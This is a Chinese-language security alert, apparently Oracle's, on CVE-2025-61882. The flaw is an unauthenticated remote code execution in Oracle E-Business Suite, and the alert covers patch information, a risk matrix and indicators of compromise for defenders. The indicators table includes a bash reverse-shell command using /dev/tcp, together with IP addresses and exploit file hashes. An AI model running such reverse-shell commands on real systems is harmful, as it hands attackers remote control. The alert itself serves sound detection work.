安全警报说明
本安全警报针对Oracle电子商务套件中的CVE-2025-61882漏洞。该漏洞无需身份验证即可远程利用,即可以通过网络利用,无需用户名和密码。如果成功利用,此漏洞可能导致远程代码执行。
Oracle强烈建议客户尽快应用此安全警报提供的更新。Oracle始终建议客户保持在受支持的版本上,并无延迟地应用所有安全警报和关键补丁更新安全补丁。请注意,2023年10月关键补丁更新是应用此安全警报中更新的先决条件。
风险矩阵下方详细列出了支持即时检测、追踪和遏制的入侵指标(IP地址、观察到的命令和文件)。
受影响产品和补丁信息
此安全警报解决的安全漏洞影响以下列出的产品。 请点击下方"补丁可用文档"列中的链接,访问补丁可用性信息和安装说明的文档。
| 受影响产品和版本 | 补丁可用文档 |
|---|---|
| Oracle E-Business Suite 版本 12.2.3-12.2.14 | Oracle E-Business Suite |
安全警报支持的产品和版本
通过安全警报程序发布的补丁仅提供给处于终身支持政策的Premier Support或Extended Support阶段的产品版本。Oracle建议客户规划产品升级,确保当前运行的版本能够获得通过安全警报程序发布的补丁。
未处于Premier Support或Extended Support的产品版本未经过此安全警报解决的漏洞测试。但是,受影响版本的早期版本很可能也受这些漏洞影响。因此,Oracle建议客户升级到受支持的版本。
风险矩阵内容
风险矩阵仅列出此公告关联补丁新解决的安全漏洞。之前安全补丁的风险矩阵可在之前的关健补丁更新公告和警报中找到。本文档中风险矩阵的英文文本版本在此处。
安全漏洞使用CVSS 3.1版本进行评分(参见Oracle CVSS评分了解Oracle如何应用CVSS 3.1版本)。
Oracle对安全警报解决的每个安全漏洞进行分析。Oracle不会向客户披露此安全分析的详细信息,但生成的风险矩阵和相关文档提供了利用漏洞所需条件以及成功利用的潜在影响的信息。Oracle提供此信息是为了让客户可以根据其产品使用的具体情况自行进行风险分析。有关更多信息,请参阅Oracle漏洞披露政策。
风险矩阵中的协议意味着其所有安全变体也受到影响。例如,如果HTTP列为受影响协议,则意味着HTTPS也受影响。仅当安全变体是唯一受影响的变体时,才会在风险矩阵中列出。
致谢声明
Oracle感谢以下组织对此次安全警报解决的安全漏洞做出的贡献:
- CrowdStrike
- Mandiant
修改历史
| 日期 | 说明 |
|---|---|
| 2025年10月6日 | Rev 2. 澄清了IOCs表 |
| 2025年10月4日 | Rev 1. 初始发布 |
Oracle E-Business Suite 风险矩阵
此安全警报包含1个针对Oracle E-Business Suite的新安全补丁。此漏洞无需身份验证即可远程利用,即可以通过网络利用,无需用户凭据。此风险矩阵的英文文本形式可在此处找到。
| CVE ID | 产品 | 组件 | 协议 | 远程利用无需认证? | 基础评分 | 攻击向量 | 攻击复杂度 | 所需权限 | 用户交互 | 范围 | 机密性 | 完整性 | 可用性 | 受影响的支持版本 | 备注 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| CVE-2025-61882 | Oracle Concurrent Processing | BI Publisher Integration | HTTP | 是 | 9.8 | 网络 | 低 | 无 | 无 | 未改变 | 高 | 高 | 高 | 12.2.3-12.2.14 |
入侵指标(IOCs)
以下入侵指标代表观察到的活动(不限于CVE-2025-61882),旨在加速检测、威胁追踪和遏制。
| 指标 | 类型 | 描述 |
|---|---|---|
| 200[.]107[.]207[.]26 | IP | 潜在的GET和POST活动 |
| 185[.]181[.]60[.]11 | IP | 潜在的GET和POST活动 |
| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | 命令 | 在特定端口上建立出站TCP连接 |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |